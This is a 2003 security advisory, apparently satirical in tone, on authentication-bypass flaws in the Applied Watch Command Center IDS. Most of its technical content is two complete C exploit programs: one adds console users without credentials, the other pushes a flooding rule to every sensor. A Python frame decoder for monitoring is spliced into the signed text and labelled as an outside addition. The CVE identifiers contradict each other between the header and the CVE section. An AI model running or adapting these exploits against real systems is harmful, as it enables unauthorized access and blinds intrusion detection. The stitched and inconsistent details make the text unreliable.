_BSSADV-0000.txt
Reported by The Bugtraq Team, 01 Dec 2003 (source: packetstormsecurity.com)
Multiple issues in Applied Watch Command Center allow authentication bypass and IDS compromise.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1  
  
Bugtraq Security Systems, Incorporated  
www.bugtraq.org  
  
Security Advisory  
  
Advisory Name: Multiple Issues in Applied Watch Command Center  
Release Date: 11/27/2003  
Application: Applied Watch  
Platform: Linux (IA32)  
Linux (sparc)  
Linux (sparc64)  
Linux (hppa)  
Linux (ppc)  
Linux (xbox)  
Linux (IA64)  
SUN Solaris (IA32)  
SUN Solaris (sparc)  
SUN Solaris (sparc64)  
OpenBSD (386)  
HPUX (hppa)  
HPUX (IA64)  
Compaq Tru64
Microsoft Windows NT (Alpha)  
Microsoft Windows NT (IA32)  
Severity: Secure protocol implementation weaknesses, allows for  
authentication bypass and compromise of IDS nodes.  
Author: The Bugtraq Team, Collectively [[email protected]]  
Vendor Status: Patches pending.  
CVE Candidate: CAN-2003-0970 - Authentication Bypass to Add IDS Rules  
CAN-2003-0971 - Authentication Bypass to Add Users  
Reference: www.bugtraq.org/advisories/_BSSADV-0000.txt   
  
  
Overview:  
The Applied Watch Command Center boasts the industry's first  
truly OS-native platform for managing network threats in real-time. It  
frees users from the unreliable, more difficult, and less-secure
Web-based monitoring environment of Snort IDS sensors. From a central,
desktop console supporting Mac, Linux, Unix, and Windows, thousands of
IDS agents and the server can be monitored. The Command Center gives   
you these benefits:  
  
1. Interprets alerts generated by third-party solutions, parsing  
the alerts into high, medium, and low priority;  
2. Allows you to identify false positives;  
3. Lets you store notes on events to prevent duplication of   
effort, saving valuable man-hours;  
4. Provides greater security with an OS-native, desktop console;  
5. Lets you avoid the high cost of Security Information Management  
Systems (SIMs); and  
6. Reduces your IDS cost of ownership.  
  
It should also be noted that the lead developer of this system is
named Jason Ish, who is a member of the core OpenBSD development team
and is therefore a security expert. He has a son named Theo, named after
the great pioneer of proactive security, Theo de Raadt.
  
There exist a number of vulnerabilities in the various components  
of the Applied Watch software suite; this advisory being the first of   
many to come regarding the various logic-related security vulnerabilities  
in the software. After all such problems are eliminated from the codebase,  
we will begin releasing another set of advisories concerning multiple   
instances in the code that allow for the remote execution of arbitrary code  
throughout the various components of this system.  
  
  
Details:  
  
[1] Adding a User  
  
Using the attached program, appliedsnatch.c, a malicious individual on a  
network protected by the Applied Watch Solution can add new users to a   
console, without having to authenticate to the system.  
  
- --- begin appliedsnatch.c ---  
  
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

/* append one big-endian 32-bit word to buf at index i, advancing i */
#define PUT_UINT32(i, val)\
{\
    buf[(i) ++] = ((val) >> 24) & 0xff;\
    buf[(i) ++] = ((val) >> 16) & 0xff;\
    buf[(i) ++] = ((val) >> 8) & 0xff;\
    buf[(i) ++] = (val) & 0xff;\
}

int main(int argc, char *argv[])
{
    unsigned char *buf;
    unsigned int idx, i;
    size_t userlen, passlen, buflen, lenidx;
    int sock;
    struct sockaddr_in sin;
    unsigned char respbuf[28];
    ssize_t n;
    SSL_CTX *sslctx;
    SSL *ssl;

    if (argc != 5) { fprintf(stderr, "usage: %s <host> <port> <user> <pass>\n", argv[0]); exit(1); }
    userlen = strlen(argv[3]);
    passlen = strlen(argv[4]);
    /* 16-byte header, two length-prefixed strings (each padded by 1..4 bytes), two trailing words */
    buf = malloc(buflen = 16 + 4 + userlen + 4 + 4 + passlen + 4 + 8);
    if (buf == NULL) { perror("malloc()"); exit(1); }
    memset(buf, 0, buflen);
    idx = 0;
    PUT_UINT32(idx, 0xbabe0001); /* protocol magic; 0xbabe0002 for other protocol ver */
    PUT_UINT32(idx, 0x6a);       /* command code: add user */
    lenidx = idx;                /* total frame length, patched in once known */
    PUT_UINT32(idx, 0xf00fc7c8);
    //PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
    PUT_UINT32(idx, userlen);
    memcpy(&buf[idx], argv[3], userlen); idx += userlen;
    idx |= 3; idx ++;            /* advance to the next 4-byte boundary */
    PUT_UINT32(idx, passlen);
    memcpy(&buf[idx], argv[4], passlen); idx += passlen;
    idx |= 3; idx ++;
    PUT_UINT32(idx, 0x1);
    PUT_UINT32(idx, 0x1);
    PUT_UINT32(lenidx, idx);
    printf("connecting\n");
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE)
    {
        struct hostent *he;

        if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
        memcpy(&sin.sin_addr, he->h_addr, sizeof(sin.sin_addr));
    }
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket()"); exit(1); }
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
    printf("doing ssl handshake\n");
    SSL_load_error_strings();
    SSL_library_init();
    if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
    if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
    if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
    if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
    printf("sending %u bytes:\n", idx);
    for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
    if (SSL_write(ssl, buf, idx) != (int)idx) { fprintf(stderr, "SSL_write()\n"); exit(1); }
    printf("\nreading:\n");
    /* read the fixed 28-byte reply; an error or a closed connection ends the program */
    i = 0;
    while (i < sizeof(respbuf))
    {
        if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) <= 0) { fprintf(stderr, "SSL_read()\n"); exit(1); }
        i += n;
    }
    for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
    printf("\n");
    /* the program treats a zero word at offset 16 of the reply as success */
    printf("adding user \"%s\" with password \"%s\" %s\n", argv[3], argv[4], (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
    SSL_shutdown(ssl);
    close(sock);
    return 0;
}
  
- --- end appliedsnatch.c ---  
  
  
[2] Adding a Rule  
  
Using the second attached program, addrule.c, a malicious individual can  
introduce custom IDS alerts to all sensor nodes on a network, allowing a  
human denial-of-service attack against the security experts monitoring the  
console. This is a valid technique for subverting intrusion detection   
systems. This is also a demonstration of the "sometimes good packets look  
like bad packets, while bad packets go unnoticed by the intrusion detection  
system" concept.  
  
- --- begin addrule.c ---  
  
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

/* append one big-endian 32-bit word to buf at index i, advancing i */
#define PUT_UINT32(i, val)\
{\
    buf[(i) ++] = ((val) >> 24) & 0xff;\
    buf[(i) ++] = ((val) >> 16) & 0xff;\
    buf[(i) ++] = ((val) >> 8) & 0xff;\
    buf[(i) ++] = (val) & 0xff;\
}

int main(int argc, char *argv[])
{
    unsigned char *buf;
    unsigned int idx, i;
    size_t rulelen, buflen, lenidx;
    int sock;
    struct sockaddr_in sin;
    unsigned char respbuf[28];
    ssize_t n;
    SSL_CTX *sslctx;
    SSL *ssl;
    const char *ruleset = "alert tcp any any -> any any (msg: \"*GOBBLE* *GOBBLE* *GOBBLE* *GOBBLE* \\:PpppppPPppppppPPPPPPpppp\";)";

    if (argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); exit(1); }
    rulelen = strlen(ruleset);
    /* 16-byte header, two words, length-prefixed rule padded by 1..4 bytes */
    buf = malloc(buflen = 16 + 4 + 4 + 4 + rulelen + 4);
    if (buf == NULL) { perror("malloc()"); exit(1); }
    memset(buf, 0, buflen);
    idx = 0;
    PUT_UINT32(idx, 0xbabe0001); /* protocol magic; 0xbabe0002 for other protocol ver */
    PUT_UINT32(idx, 0x6f);       /* command code: add rule */
    lenidx = idx;                /* total frame length, patched in once known */
    PUT_UINT32(idx, 0xf00fc7c8);
    //PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
    PUT_UINT32(idx, 0);
    PUT_UINT32(idx, 1);
    PUT_UINT32(idx, rulelen);
    memcpy(&buf[idx], ruleset, rulelen); idx += rulelen;
    idx |= 3; idx ++;            /* advance to the next 4-byte boundary */
    PUT_UINT32(lenidx, idx);
    printf("connecting\n");
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE)
    {
        struct hostent *he;

        if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
        memcpy(&sin.sin_addr, he->h_addr, sizeof(sin.sin_addr));
    }
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket()"); exit(1); }
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
    printf("doing ssl handshake\n");
    SSL_load_error_strings();
    SSL_library_init();
    if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
    if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
    if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
    if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
    printf("sending %u bytes:\n", idx);
    for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
    if (SSL_write(ssl, buf, idx) != (int)idx) { fprintf(stderr, "SSL_write()\n"); exit(1); }
    printf("\nreading:\n");
    /* read the fixed 28-byte reply; an error or a closed connection ends the program */
    i = 0;
    while (i < sizeof(respbuf))
    {
        if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) <= 0) { fprintf(stderr, "SSL_read()\n"); exit(1); }
        i += n;
    }
    for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
    printf("\n");
    /* the program treats a zero word at offset 16 of the reply as success */
    printf("adding nasty ruleset %s\n", (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
    SSL_shutdown(ssl);
    close(sock);
    return 0;
}
  
- --- end addrule.c ---  
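As an added example that is not part of the advisory or of the vendor's code, the following Python decoder reads back the frame layout both programs above construct (big-endian words, a 16-byte header, strings prefixed by a 4-byte length and rounded up to the next 4-byte boundary) and produces the line a console-side monitor on the decrypted stream could log for add-user and add-rule commands. The sample frames are constructed, not captured, and the meaning of the fourth header word is an assumption: the decoder only records whether it equals the constant both programs send there.

```python
import struct

MAGICS = (0xBABE0001, 0xBABE0002)  # the two protocol versions the programs mention
OP_ADD_USER, OP_ADD_RULE = 0x6A, 0x6F
FIXED_WORD = 0xF00FC7C8  # constant both programs send in the 4th header word (assumed token slot)

def _pad4(n):
    return (n | 3) + 1  # as 'idx |= 3; idx++' in the C code: next multiple of 4, adding 1..4 bytes

def _take_string(data, off):
    """uint32 big-endian length, the bytes, then skip to the next 4-byte boundary."""
    (length,) = struct.unpack_from(">I", data, off)
    body = data[off + 4:off + 4 + length]
    if len(body) != length:
        raise ValueError("truncated string field")
    return body, _pad4(off + 4 + length)

def parse_frame(data):
    """Decode one console frame into a dict; raises ValueError on an inconsistent header."""
    if len(data) < 16:
        raise ValueError("short header")
    magic, opcode, total, word4 = struct.unpack_from(">IIII", data, 0)
    if magic not in MAGICS or total != len(data):
        raise ValueError("bad magic or length field")
    frame = {"opcode": opcode, "fixed_word": word4 == FIXED_WORD}
    off = 16
    if opcode == OP_ADD_USER:
        frame["user"], off = _take_string(data, off)
        frame["password"], off = _take_string(data, off)
        frame["flags"] = struct.unpack_from(">II", data, off)
    elif opcode == OP_ADD_RULE:
        frame["args"] = struct.unpack_from(">II", data, off)
        frame["rule"], off = _take_string(data, off + 8)
    return frame

def alert_line(data):  # what a monitor on the decrypted stream would log for one frame
    f = parse_frame(data)
    what = {OP_ADD_USER: ("add-user", f.get("user")), OP_ADD_RULE: ("add-rule", f.get("rule"))}
    name, arg = what.get(f["opcode"], ("opcode 0x%x" % f["opcode"], b""))
    return "%s %s%s" % (name, arg.decode("latin-1"), " [fixed 4th word]" if f["fixed_word"] else "")

# Constructed sample frames (not captured traffic), laid out as appliedsnatch.c / addrule.c build them.
SAMPLE_ADD_USER = (
    b"\xba\xbe\x00\x01\x00\x00\x00\x6a\x00\x00\x00\x28\xf0\x0f\xc7\xc8"  # magic, 0x6a, len 40, word4
    b"\x00\x00\x00\x03bob\x00"            # user "bob", padded to offset 24
    b"\x00\x00\x00\x02pw\x00\x00"         # password "pw", padded to offset 32
    b"\x00\x00\x00\x01\x00\x00\x00\x01")  # two trailing words of 1
RULE = b'alert tcp any any -> any any (msg:"t";)'  # 39 bytes
SAMPLE_ADD_RULE = (
    b"\xba\xbe\x00\x01\x00\x00\x00\x6f\x00\x00\x00\x44\xf0\x0f\xc7\xc8"  # magic, 0x6f, len 68, word4
    + b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x27" + RULE + b"\x00")
```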
  
  
Vendor Response:  
Bugtraq Security have attempted to contact the vendor multiple  
times since the discovery of these vulnerabilities without success. A  
public statement issued by the founder of the company, Eric Hines, helps  
us understand why the company was unavailable for comment at the time:  
  
"You've got to realize that these people are walking around with  
exploits that vendors haven't even heard of yet. They're pissed and   
they've got this almost God-like power that enables them to break into  
any network that they want," Hines said. He reported that FateLabs.com  
was knocked offline last week by a denial-of-service attack immediately  
after the security firm published an advisory about a security bug.  
  
We expect that once their network recovers from said incident, they
will issue binary patches to both their clients and help reduce the
threat of compromise against those networks. Undoubtedly they are aware
of these vulnerabilities already, and were hoping they would be brought
to public attention as, according to their website, they are "soldiers
for full disclosure".
  
ThreatCon:  
The release of this information and exploits increases the Global  
ThreatCon Level to a record-breaking index of 9/13 (more dangerous than  
normal) level. We hope that Applied Watch will release their patches   
soon so that the ThreatCon can be lowered to a more reasonable level. If  
you have any questions regarding the Global ThreatCon, please visit  
http://www.bugtraq.org/threatcon.html  
  
  
Recommendation:  
If the security of your network is required, then Fatelabs /  
AppliedWatch products should be removed or disabled on the host in  
question. If it is not required, enterprises should deploy vendor patches  
for the above vulnerabilities when they become available. In addition,  
enterprises should look to remove all default services if not required in  
production systems or adequately protect those that are required and   
undertake other obvious security measures.  
  
Common Vulnerabilities and Exposures (CVE) Information:  
  
The Common Vulnerabilities and Exposures (CVE) project has assigned   
the following names to these issues. These are candidates for   
inclusion in the CVE list (http://cve.mitre.org), which standardizes   
names for security problems.  
  
CAN-2003-0960 - Logical error in Applied Watch Console allowing user-adds  
CAN-2003-0961 - Logical error in Applied Watch Nodes allowing rule-adds  
  
Bugtraq Security Systems Vulnerability Reporting Policy:   
http://www.bugtraq.org/research/policy/  
  
Bugtraq Security Systems Advisory Archive:  
http://www.bugtraq.org/advisories.html  
  
Bugtraq Security Systems PGP Key:  
http://www.bugtraq.org/pgp_key.asc  
  
Bugtraq Security Systems is currently seeking application security experts   
to fill several consulting positions. Applicants should have strong   
application development skills and be able to perform application security  
design reviews, code reviews, and application penetration testing. Please  
send resumes to [email protected]  
  
Copyright 2003 Bugtraq Security Systems. All rights reserved.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.1 (GNU/Linux)  
  
iD8DBQE/xqQad3IqHnpF3voRAk2vAJ9a7JgZ8p/FRCdgN/qjqYMEyYnj+QCgkGor  
vYwTicr3iCtfdrbxc0eeocY=  
=GAEl  
-----END PGP SIGNATURE-----  
